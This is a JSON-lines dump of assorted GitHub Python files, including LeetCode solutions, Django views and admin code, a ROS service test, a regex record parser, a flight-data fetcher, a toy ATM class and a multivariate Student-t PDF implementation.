+{"seq_id":"45102797009","text":"import rospy\nimport actionlib\n\n\ndef motion_test(self, goals, goal_type=0):\n \"\"\"goals =[left arm, right arm]\"\"\"\n service_name = \"execute_all_joint_poses\"\n group_name = 'dual_arm'\n try:\n rospy.wait_for_service(service_name, 1)\n client = rospy.ServiceProxy(service_name, ExecuteAllJointPoses)\n except rospy.ROSException:\n rospy.logwarn('Service ' + service_name + ' not available')\n return None\n req = ExecuteAllJointPosesRequest()\n req.group_name = group_name\n req.goals = ros_utils.to_posearray_msg(goals)\n req.goal_type = goal_type\n resp = client(req)\n if resp.result_status == resp.FAILED:\n rospy.logerr('execute both joint pose failed')\n return False\n return True\n\ndef main():\n\n rospy.init_node(\"nachi_test\")\n arm_grasp.run_ee_sim()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"zhengshuai1/robotiqcustom_ws","sub_path":"scripts/utils/srv_test.py","file_name":"srv_test.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34138868113","text":"#\n# @lc app=leetcode id=236 lang=python3\n#\n# [236] Lowest Common Ancestor of a Binary Tree\n#\n# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (42.53%)\n# Likes: 3115\n# Dislikes: 164\n# Total Accepted: 412.6K\n# Total Submissions: 953.4K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# Given a binary tree, find the lowest common ancestor (LCA) of two given nodes\n# in the tree.\n# \n# According to the definition of LCA on Wikipedia: “The lowest common ancestor\n# is defined between two nodes p and q as the lowest node in T that has both p\n# and q as descendants (where we allow a node to be a descendant of itself).”\n# \n# Given the following binary tree: root = [3,5,1,6,2,0,8,null,null,7,4]\n# \n# \n# \n# Example 1:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# Output: 3\n# Explanation: The LCA of nodes 5 and 1 is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# Output: 5\n# Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant\n# of itself according to the LCA definition.\n# \n# \n# \n# \n# Note:\n# \n# \n# All of the nodes' values will be unique.\n# p and q are different and both values will exist in the binary tree.\n# \n# \n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n \"\"\"\n ✔ Your runtime beats 23.52 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (29.1 MB)\n \"\"\"\n self.preorder = 0\n found = set()\n post = []\n def dfs(node):\n if node:\n self.preorder += 1\n if node is p:\n found.add(node)\n if node is q:\n found.add(node)\n \n node.preorder = self.preorder\n dfs(node.left)\n dfs(node.right)\n node.postorder = len(post) + 1\n post.append(node)\n \n dfs(root)\n \n mn_preorder = [f.preorder for f in found]\n mx_postorder = [f.postorder for f in found]\n \n for node in post:\n if node.preorder <= min(mn_preorder) and node.postorder >= max(mx_postorder):\n return node\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n @ stefan\n ✔ Your runtime beats 6.8 % of python3 submissions\n ✔ Your memory usage beats 5.55 % of python3 submissions (39.1 MB)\n \"\"\"\n if root in (None, p, q): return root\n l, r = (self.lowestCommonAncestor(subtree, p, q) for subtree in (root.left, root.right))\n return root if l and r else l or r\n\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n official answer\n \"\"\"\n def recur(node):\n if not node: return False\n left = recur(node.left)\n right = recur(node.right)\n mid = node == p or node == q\n if mid + left + right >= 2:\n self.ans = node\n return mid or left or right\n self.ans = None\n recur(root)\n return self.ans\n\n# @lc code=end\n","repo_name":"nickyfoto/lc","sub_path":"python/tests/236_lowest_common_ancestor_of_a_binary_tree.py","file_name":"236_lowest_common_ancestor_of_a_binary_tree.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11532204952","text":"from core.models import Role\nfrom .models import AccountUser, PermissionLog\nfrom .serializers import AccountUserSerializers, PermissionLogSerializers, UserSerializer\nfrom rest_framework import viewsets\nfrom django.contrib.auth.models import User\n\n\nclass AccountUserViewSet(viewsets.ModelViewSet):\n serializer_class = AccountUserSerializers\n queryset = AccountUser.objects.all()\n\n def perform_create(self, serializer):\n super().perform_create(serializer)\n\n fields = {\n 'properties': serializer.instance.properties.values_list('id', flat=True),\n }\n try:\n serializer.instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n new_role=serializer.instance.role\n )\n\n serializer.instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_CREATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=list(fields.get('properties')),\n old_props=list()\n )\n except Exception as e:\n # logger.exception(e)\n print(e)\n pass\n\n def perform_update(self, serializer):\n instance = self.get_object()\n\n previous_fields = {\n 'properties': list(instance.properties.values_list('id', flat=True)),\n 'role': getattr(instance.role, \"pk\", None),\n }\n\n super().perform_update(serializer)\n\n previous_property_ids = set(previous_fields['properties'])\n property_ids = set(list(serializer.instance.properties.values_list('id', flat=True)))\n\n fields = {\n 'properties': list(property_ids.symmetric_difference(previous_fields['properties'])),\n 'role': (serializer.instance.role.pk,) if serializer.instance.role.pk != previous_fields['role'] else []\n }\n # logging start here\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n new_role=serializer.instance.role\n )\n\n added_properties = property_ids - previous_property_ids\n removed_properties = previous_property_ids - property_ids\n\n if added_properties or removed_properties:\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_UPDATED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n new_props=added_properties,\n old_props=removed_properties\n )\n\n def perform_destroy(self, instance):\n fields = {\n 'properties': instance.properties.values_list('id', flat=True),\n 'role': getattr(instance.role, \"pk\", None)\n }\n instance.log_role_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.ROLE_CHANGED,\n old_role=instance.role,\n )\n instance.log_property_change(\n source=PermissionLog.ACCOUNT_USER_DELETED,\n type_of_change=PermissionLog.PROPERTY_CHANGED,\n old_props=list(fields.get('properties')),\n new_props=list()\n )\n super().perform_destroy(instance)\n\n\nclass PermissionLogView(viewsets.ModelViewSet):\n serializer_class = PermissionLogSerializers\n queryset = PermissionLog.objects.all()\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n serializer_class = UserSerializer\n queryset = User.objects.all()\n","repo_name":"cloverananya/13094","sub_path":"manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21701685393","text":"from nautilus_trader.core.correctness import PyCondition\nfrom nautilus_trader.test_kit.performance import PerformanceHarness\n\n\nclass TestCorrectnessConditionPerformance(PerformanceHarness):\n def test_condition_none(self):\n self.benchmark.pedantic(\n target=PyCondition.none,\n args=(None, \"param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 142ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_true(self):\n self.benchmark.pedantic(\n target=PyCondition.true,\n args=(True, \"this should be true\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.1μs / 149ns minimum of 100,000 runs @ 1 iteration each run.\n\n # 100000 iterations @ 12ms with boolean except returning False\n # 100000 iterations @ 12ms with void except returning * !\n\n def test_condition_valid_string(self):\n self.benchmark.pedantic(\n target=PyCondition.valid_string,\n args=(\"abc123\", \"string_param\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 205ns minimum of 100,000 runs @ 1 iteration each run.\n\n def test_condition_type_or_none(self):\n self.benchmark.pedantic(\n target=PyCondition.type_or_none,\n args=(\"hello\", str, \"world\"),\n iterations=100_000,\n rounds=1,\n )\n # ~0.0ms / ~0.2μs / 224ns minimum of 100,000 runs @ 1 iteration each run.\n","repo_name":"nautechsystems/nautilus_trader","sub_path":"tests/performance_tests/test_perf_correctness.py","file_name":"test_perf_correctness.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1199,"dataset":"github-code","pt":"16"}
+{"seq_id":"5215328964","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: wushaohong\n@time: 2019-09-26 09:46\n\"\"\"\n\"\"\"给定一个非负整数数组,你最初位于数组的第一个位置。\n\n数组中的每个元素代表你在该位置可以跳跃的最大长度。\n\n你的目标是使用最少的跳跃次数到达数组的最后一个位置。\n\n示例:\n\n输入: [2,3,1,1,4]\n输出: 2\n解释: 跳到最后一个位置的最小跳跃数是 2。\n 从下标为 0 跳到下标为 1 的位置,跳 1 步,然后跳 3 步到达数组的最后一个位置。\n说明:\n\n假设你总是可以到达数组的最后一个位置。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/jump-game-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\"\"\"\n\n\nclass Solution:\n def jump(self, nums) -> int:\n n = len(nums)\n dp = [float(\"inf\")] * n\n dp[0] = 0\n for i in range(1, len(nums)):\n for j in range(i):\n if nums[j] >= i - j:\n dp[i] = min(dp[i], dp[j] + 1)\n # print(dp)\n return dp[-1]\n\n def jump2(self, nums) -> int:\n # if len(nums) == 1:\n # return 0\n count = 0\n point = 0\n while point < len(nums) and nums[point] < len(nums) - point - 1:\n temp = 0\n p = point\n for i in range(1, nums[p] + 1):\n if nums[p + i]+p+i >= temp:\n temp = nums[p + i]+p+i\n point = p + i\n count += 1\n\n return count + 1\n\n\ndef jump(nums):\n end = 0\n maxPosition = 0\n steps = 0\n for i in range(len(nums) - 1):\n # 找能跳的最远的\n maxPosition = max(maxPosition, nums[i] + i)\n if i == end:\n # 遇到边界,就更新边界,并且步数加一\n end = maxPosition\n steps += 1\n return steps\n\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.jump([2, 3, 1, 1, 4]))\n print(sol.jump2([2, 3, 1, 1, 4]))\n print(jump([2, 3, 1, 1, 4]))\n","repo_name":"hshrimp/letecode_for_me","sub_path":"letecode/1-120/25-48/45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"13819264471","text":"\"\"\"Regex, I think.\"\"\"\nimport re\n\n\nclass Entry:\n \"\"\"Entry class.\"\"\"\n\n def __init__(self, first_name: str, last_name: str, id_code: str, phone_number: str, date_of_birth: str,\n address: str):\n \"\"\"Init.\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.id_code = id_code\n self.phone_number = phone_number\n self.date_of_birth = date_of_birth\n self.address = address\n\n def format_date(self):\n \"\"\"\n Return the date in the following format: 'Day: {day}, Month: {month}, Year: {year}'.\n\n Just for fun, no points gained or lost from this.\n\n Example: 'Day: 06, Month: 11, Year: 1995'\n If the object doesn't have date of birth given, return None.\n :return:\n \"\"\"\n date = self.date_of_birth\n if date is not None:\n date_list = date.split(\"-\")\n for i in range(len(date_list)):\n if i == 0:\n day = date_list[i]\n elif i == 1:\n month = date_list[i]\n elif i == 2:\n year = date_list[i]\n return f'Day: {day}, Month: {month}, Year: {year}'\n\n def __repr__(self) -> str:\n \"\"\"Object representation.\"\"\"\n return f\"Name: {self.first_name} {self.last_name}\\n\" \\\n f\"ID code: {self.id_code}\\n\" \\\n f\"Phone number: {self.phone_number}\\n\" \\\n f\"Date of birth: {self.format_date()}\\n\" \\\n f\"Address: {self.address}\"\n\n def __eq__(self, other) -> bool:\n \"\"\"\n Compare two entries.\n\n This method is perfect. Don't touch it.\n \"\"\"\n return self.first_name == other.first_name \\\n and self.last_name == other.last_name \\\n and self.id_code == other.id_code \\\n and self.phone_number == other.phone_number \\\n and self.date_of_birth == other.date_of_birth \\\n and self.address == other.address\n\n\ndef parse(row: str) -> Entry:\n \"\"\"\n Parse data from input string.\n\n :param row: String representation of the data.\n :return: Entry object with filled values\n \"\"\"\n regex = re.finditer(r\"(^[A-ZÕÜÖÄ]+[a-züõöä]+)?\"\n r\"([A-ZÕÜÖÄ]+[a-züõöä]+(?=\\d))?\"\n r\"([\\d]{11})\"\n r\"((?<=[\\d]{3})\\+[0-9]{3} ?[0-9]{7,8}|(?<=[\\d]{11})[0-9]{7,8})?\"\n r\"(\\d\\d-\\d\\d-\\d\\d\\d\\d)?\"\n r\"([\\w\\D\\d]+)?\", row)\n for match in regex:\n first_name = match.group(1)\n last_name = match.group(2)\n id_code = match.group(3)\n phone_number = match.group(4)\n date_of_birth = match.group(5)\n address = match.group(6)\n entry = Entry(first_name, last_name, id_code, phone_number, date_of_birth, address)\n return entry\n\n\nif __name__ == '__main__':\n print(parse('PriitPann39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('39712047623+372 5688736402-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: None None\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann3971204762302-12-1998Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: None\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 56887364Oja 18-2,Pärnumaa,Are'))\n \"\"\"\n Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: None\n Address: Oja 18-2,Pärnumaa,Are\n \"\"\"\n print()\n print(parse('PriitPann39712047623+372 5688736402-12-1998'))\n \"\"\"Name: Priit Pann\n ID code: 39712047623\n Phone number: +372 56887364\n Date of birth: Day: 02, Month: 12, Year: 1998\n Address: None\n \"\"\"\n","repo_name":"Krissuper11/Python","sub_path":"EX/ex06_regex/entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37861849632","text":"#!/usr/bin/env python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-09-15 15:08\n# Last modified: 2017-10-07 17:16\n# Filename: create_fake_db.py\n# Description:\nimport sys\nimport os\nimport django\n\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nprint(base_dir)\nsys.path.append(base_dir)\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"SRPA.settings\")\ndjango.setup()\n\nfrom django.contrib.auth.models import User, Group\nfrom authentication import USER_IDENTITY_STUDENT, USER_IDENTITY_TEACHER\nfrom authentication import INSTITUTES\nfrom authentication.models import StudentInfo, TeacherInfo\nfrom const.models import Site, Workshop\nfrom SiteReservation.models import Reservation\nfrom ProjectApproval.models import Project, SocialInvitation\nfrom tools.utils import assign_perms\n\n\ndef create_student_info(num=10, prefix='student_'):\n students = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = StudentInfo(\n user=user, identity=USER_IDENTITY_STUDENT,\n phone=str(i), student_id=str(i))\n info.save()\n assign_perms('studentinfo', user, info)\n assign_perms('reservation', user, perms='add',\n app_name='SiteReservation')\n assign_perms('project', user, perms='add',\n app_name='ProjectApproval')\n students.append(info)\n return students\n\n\ndef create_teacher_info(num=10, prefix='teacher_'):\n teachers = []\n for i in range(1, 1 + num):\n user = User.objects.create_user(\n username=prefix + str(i),\n password=str(i),\n first_name=str(i))\n info = TeacherInfo(\n user=user, identity=USER_IDENTITY_TEACHER)\n info.save()\n assign_perms('teacherinfo', user, info)\n teachers.append(info)\n return teachers\n\n\ndef create_site(num=10, prefix='site_'):\n for i in range(1, 1 + num):\n site = Site(desc=prefix + str(i))\n site.save()\n\n\ndef create_workshop(num=10, prefix='workshop_'):\n for i in range(1, 1 + num):\n desc = prefix + str(i)\n group, _ = Group.objects.get_or_create(name=desc)\n workshop = Workshop(desc=desc, group=group)\n workshop.save()\n\n\ndef main():\n create_student_info()\n teachers = create_teacher_info()\n create_site()\n create_workshop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Time1ess/SRPA","sub_path":"scripts/create_fake_db.py","file_name":"create_fake_db.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28504431764","text":"import os\nimport sqlite3\nfrom sqlite3.dbapi2 import OperationalError\nimport requests\nimport datetime\n\nAPI_ROOT = 'https://opensky-network.org/api'\n\nos.chdir('D:/Works_Backups/Python/flytech/flytech')\n\nr = requests.get(url=API_ROOT + '/states/all')\ntime = r.json()['time']\nctime = datetime.datetime.fromtimestamp(time).strftime('%Y-%m-%d - %H:%M:%S')\n# states is a two dimensional list\nstates = r.json()['states']\nconn = sqlite3.connect('apadana.sqlite3')\ncur = conn.cursor()\ntry:\n data = cur.execute('SELECT id FROM dflight')\nexcept OperationalError:\n sql = \"\"\"CREATE TABLE dflight(\n id integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n icao varchar(8),\n callsign varchar(10),\n country varchar(100),\n updated DATETIME\n );\"\"\"\n cur.execute(sql)\n print('dflight created')\nfor state in states:\n sql = \"\"\"INSERT INTO dflight (icao, callsign, country, updated)\n VALUES(?, ?, ?, ?);\"\"\"\n cur.execute(sql, (state[0], state[1], state[2], ctime))\nconn.commit()\nconn.close()\n","repo_name":"ebikdeli/flytech","sub_path":"assets/flight_data.0eba16b8e7c5.py","file_name":"flight_data.0eba16b8e7c5.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"39932033375","text":"class Solution:\n def merge(self, intervals):\n l = sorted(intervals, key = lambda x:(x[0], x[1]))\n res = []\n for i in range(len(l)):\n low, high = l[i][0], l[i][1]\n if res and low <= res[-1][1]:\n res[-1][1] = max(res[-1][1], high)\n else:\n res.append([low, high])\n return res","repo_name":"mihir254/LeetCode","sub_path":"Medium/56-Merge-Intervals.py","file_name":"56-Merge-Intervals.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"30594513347","text":"from account import Bank\n\nclass ATM:\n\n def __init__(self, screen, card_reader, cash_dispenser,\n cheque_deposit_slot, cash_deposit_slot, printer):\n self.amount = 0\n self.screen = screen\n self.card_reader = card_reader\n self.cash_dispenser = cash_dispenser\n self.cash_deposit_slot = cash_deposit_slot\n self.cheque_deposit_slot = cheque_deposit_slot\n self.printer = printer\n self.account = None\n bank=Bank()\n bank.prepare_bank()\n\n def add_cash(self, amount):\n self.amount = amount\n\n def add_cash_customer(self, amount):\n self.amount += amount\n self.account.add_cash(amount)\n\n def debit_cash(self, amount):\n if self.account.amount < amount:\n raise Exception(\"you dont have enough cash\")\n\n if amount > self.amount:\n raise Exception(\"Not Enough Cash in atm\")\n self.amount -= amount\n self.account.amount -= amount\n\n def detail(self):\n msg = \"amount :\" + str(self.amount)\n self.screen.print_(msg)\n\n def enquiry(self):\n self.account.enquiry()\n\n def transfer(self, account_no, amount):\n bank = Bank()\n transfer_account = bank.get_account_by_no(account_no)\n self.account.check_amount_enough(amount)\n self.account.debit_cash(amount)\n transfer_account.add_cash(amount)\n","repo_name":"rnshaikh/SSD","sub_path":"ATM/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6290551652","text":"import sys\nsys.setrecursionlimit(10**5)\n\nN, M = map(int, sys.stdin.readline().split())\n\nboard = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n\n\nisVisits = [[False for _ in range(M)] for _ in range(N)]\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\ndef dfs(x, y):\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and isVisits[nx][ny]:\n isVisits[nx][ny] = False\n if board[nx][ny]:\n dfs(nx, ny)\narea = 0\nwhile True:\n area += 1\n for x in range(N):\n for y in range(M):\n if board[x][y]:\n isVisits[x][y] = True\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < N and 0 <= ny < M and not isVisits[nx][ny]:\n if not board[nx][ny]:\n board[x][y] -= 1\n if board[x][y] == 0:\n break\n print(*board, sep='\\n')\n check = 0\n for x in range(N):\n for y in range(M):\n if board[x][y] and isVisits[x][y]:\n dfs(x, y)\n check += 1\n elif not board[x][y] and isVisits[x][y]:\n isVisits[x][y] = False\n\n if check >= 2:\n print(area)\n break\n elif check == 0:\n print(0)\n break\n\n","repo_name":"saint6839/jungle-week-03","sub_path":"Week03/saint6839/2573.py","file_name":"2573.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35078600685","text":"# Register your models here.\nfrom django.contrib import admin\nfrom .models import Body,TurorialCategory,TurorialSeries,Turorial\n\nclass ProductAdmin(admin.ModelAdmin):\n\tlist_display=['title','tutorial_slug','published']\t\n\tclass Meta:\n\t\tmodel= Turorial\n\nadmin.site.register(Body)\nadmin.site.register(TurorialSeries)\nadmin.site.register(TurorialCategory)\nadmin.site.register(Turorial,ProductAdmin)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#class PlaceAdmin(admin.ModelAdmin):\n#\tsearch_fields=['name','description']\n#\tlist_editable=['price','active','featured']\n#\tclass Meta:\n#\t\tmodel= Places\n\n#class BodyAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured','updated']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Body\n\n#class QuotepicsAdmin(admin.ModelAdmin):\n#\tsearch_fields=['description']\n#\tlist_display=['description','featured']\n#\tlist_editable=['description','featured']\n#\tclass Meta:\n#\t\tmodel= Quotepics\n\n\n\n\n#admin.site.register(Places,PlacesAdmin)\n#admin.site.register(DiscountField)\n\n\n\n#from . import models\n#from .models import Places,DiscountField,Body,Quotepics\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#from .models import Product,ProductImage,HomePage\n\n#class ProductAdmin(admin.ModelAdmin):\n#\tsearch_fields=['title','description','slug']\n#\tlist_display=['title','price','active','updated']\n#\tlist_editable=['price','active']\n#\tclass Meta:\n#\t\tmodel= Product\n\n#admin.site.register(Product,ProductAdmin)\n\n#admin.site.register(ProductImage)\n\n#admin.site.register(HomePage)","repo_name":"shivamsjjha/django_product_management_app","sub_path":"products/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28506185644","text":"\"\"\"\nA multivariate Student-t PDF.\n\nAuthor:\n Panagiotis Tsilifis\n\nDate:\n 6/5/2014\n\n\"\"\"\n\n\n__all__ = ['MultivariateT']\n\n\nimport numpy as np\nimport math\nimport scipy.linalg\nfrom scipy import special\nfrom . import make_vector\nfrom . import call_many\nfrom . import PDFBase\n\n\nclass MultivariateT(PDFBase):\n\n \"\"\"\n A class representing the PDF of a multivariate Normal distribution.\n\n :param mu: The location of the distribution.\n :type mu: :class:`numpy.ndarray`\n :param C: The scale matrix. It is taken to be the unit matrix,\n if it is not specified.\n :type C: :class:`numpy.ndarray`\n\n :param nu: The degrees of freedom\n :type nu: Integer\n\n \"\"\"\n\n # The location\n _mu = None\n\n # The scale matrix\n _C = None\n\n # The degrees of freedom\n _nu = None\n\n # The Cholesky decomposition of C\n _L = None\n\n # The log of determinant of C\n _log_det_C = None\n\n # The inverse of C\n _inv_C = None\n\n @property\n def mu(self):\n \"\"\"\n :getter: The location of the distribution. Internally, it is represented\n as a row matrix.\n :setter: Set mu.\n \"\"\"\n return self._mu\n\n @mu.setter\n def mu(self, value):\n \"\"\"\n Set mu.\n \"\"\"\n value = make_vector(value)\n assert value.shape[0] == self.num_dim\n self._mu = value\n\n @property\n def C(self):\n \"\"\"\n :getter: The scale matrix.\n :setter: Set scale matrix.\n \"\"\"\n return self._C\n\n @C.setter\n def C(self, value):\n \"\"\"\n Set the covariance matrix\n \"\"\"\n assert value.ndim == 2\n assert value.shape[0] == self.num_dim and value.shape[1] == self.num_dim\n self._C = value\n # If the following fails, then we have a rank defficient covariance\n try:\n self._L = scipy.linalg.cho_factor(self.C, lower=True)\n self._inv_C = scipy.linalg.cho_solve(self.L, np.eye(self.num_dim))\n self._log_det_C = 2. * np.sum(np.log(np.diag(self.L[0])))\n except scipy.linalg.LinAlgError as e:\n # In this case, we need to find any matrix L such that C = L * L^T.\n # Only sampling will work. The log PDF, the gradient and the Hessian are\n # garbage in this case.\n self._inv_C = np.zeros((self.num_dim, self.num_dim))\n self._log_det_C = 0.\n lam, V = scipy.linalg.eigh(self.C)\n idx = lam > 1e-10\n lam = lam[idx]\n V = V[:, idx]\n L = np.dot(V, np.diag(np.sqrt(lam)))\n Cp = np.dot(L, L.T)\n self._L = (L, None)\n\n @property\n def L(self):\n \"\"\"\n :getter: The Cholesky decomposition of C.\n \"\"\"\n return self._L\n\n @property\n def log_det_C(self):\n \"\"\"\n :getter: The logarithm of the determinant of ``C``.\n \"\"\"\n return self._log_det_C\n\n @property\n def inv_C(self):\n \"\"\"\n :getter: The inverse of ``C``.\n \"\"\"\n return self._inv_C\n\n @property\n def nu(self):\n \"\"\"\n :getter: The degrees of freedom.\n :setter: Set nu.\n \"\"\"\n return self._nu\n\n @nu.setter\n def nu(self, value):\n \"\"\"\n Set nu.\n \"\"\"\n #assert isinstance(value, int)\n self._nu = value\n\n def __init__(self, mu, nu, C=None, name='Multivariate Student-t'):\n \"\"\"\n Initialize the object.\n \"\"\"\n self._mu = make_vector(mu)\n super(MultivariateT, self).__init__(self.mu.shape[0], name=name)\n if C is None:\n C = np.eye(self.num_dim)\n self.C = C\n self.nu = nu\n # const is the part of the likelihood that does not depend on any parameter\n self._const = -0.5 * self.num_dim * math.log(math.pi)\n\n def _eval(self, x):\n \"\"\"\n Evaluate the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n z1 = -np.log(special.gamma(self.nu / 2.))\n z2 = -0.5 * self.num_dim * np.log(self.nu)\n z3 = -0.5 * (self.nu + self.num_dim) * np.log(1. + np.dot(t.T, t) / self.nu)\n z4 = np.log(special.gamma((self.nu + self.num_dim) / 2.))\n return z1 + z2 + self._const - 0.5 * self.log_det_C + z3 + z4\n\n def _eval_grad(self, x):\n \"\"\"\n Evaluate the gradient of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)[None, :]\n return (self.nu + self.num_dim) * res / (quadr * self.nu)\n\n def _eval_hessian(self, x):\n \"\"\"\n Evaluate the Hessian of the log of the PDF at x.\n \"\"\"\n t = scipy.linalg.solve_triangular(self.L[0], self.mu - x, lower=self.L[1])\n quadr = 1 + np.dot(t.T, t) / self.nu\n res = scipy.linalg.cho_solve(self.L, self.mu - x)\n return (self.nu + self.num_dim) * ( 2. * np.dot(res, np.transpose(res)) / quadr - self.inv_C ) / (quadr * self.nu)\n\n def _eval_grad_mu(self, x):\n \"\"\"\n Evaluate the gradient with respect to mu at x.\n \"\"\"\n return -self._eval_grad(x)\n\n def grad_mu(self, x):\n \"\"\"\n Evaluate the derivative with respect to mu at x.\n \"\"\"\n return call_many(x, self._eval_grad_mu)\n\n def __str__(self):\n \"\"\"\n Return a string representation of the object.\n \"\"\"\n s = super(MultivariateT, self).__str__() + '\\n'\n s += 'mu:\\n'\n s += str(self.mu) + '\\n'\n s += 'C:\\n'\n s += str(self.C) + '\\n'\n s += 'nu:\\n'\n s += str(self.nu)\n return s\n","repo_name":"ebilionis/variational-reformulation-of-inverse-problems","sub_path":"vuq/_multivariate_t.py","file_name":"_multivariate_t.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
